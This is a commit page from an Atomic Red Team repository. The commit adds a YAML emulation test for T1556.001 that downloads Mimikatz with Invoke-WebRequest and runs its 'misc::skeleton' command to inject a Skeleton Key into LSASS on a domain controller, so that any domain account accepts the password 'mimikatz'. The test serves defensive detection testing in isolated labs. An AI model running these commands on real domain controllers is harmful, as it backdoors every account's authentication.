security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create new test - T1556.001 (#3310)

Browse Source 
Co-authored-by: Hare Sudhan <27735081+cyberbuff@users.noreply.github.com>
This commit is contained in:
Dan Rogers
2026-04-15 21:08:04 -06:00
committed by GitHub
parent 929d64a1b7
commit 16ddc50340
1 changed files with 46 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1556.001/T1556.001.yaml
+46
View File
@@ -0,0 +1,46 @@
attack_technique: T1556.001
display_name: 'Modify Authentication Process: Domain Controller Authentication'
atomic_tests:
- name: Skeleton Key via Mimikatz
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at #{mimikatz_path}
prereq_command: |
if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: |
& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true